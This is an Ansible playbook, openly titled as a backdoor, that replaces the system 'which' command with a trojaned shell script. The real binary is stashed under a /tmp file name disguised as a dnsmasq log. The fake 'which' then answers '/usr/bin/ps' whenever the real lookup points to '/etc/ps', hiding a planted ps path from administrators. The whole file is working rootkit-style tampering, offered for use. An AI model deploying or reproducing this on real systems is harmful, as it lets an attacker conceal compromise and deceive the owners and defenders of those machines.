---
- name: "backdoored which to hide path injection for ps"
  hosts: localhost
  connection: local
  tasks:
    - name: "move which"
      shell: "mv /usr/bin/which /tmp/dnsmasq-tmp-log-199sjduse8kxp200oz8s"
    - name: "make new which file"
      shell: "touch /usr/bin/which; chmod +x /usr/bin/which"
    - name: "populate new which file line 1"
      shell: "echo '#!/bin/sh' >> /usr/bin/which"
    - name: "populate new which file line 2"
      shell: "echo 'if /tmp/dnsmasq-tmp-log-199sjduse8kxp200oz8s $@ | grep -q '/etc/ps'; then echo '/usr/bin/ps'; else /tmp/dnsmasq-tmp-log-199sjduse8kxp200oz8s $@; fi;' >> /usr/bin/which"


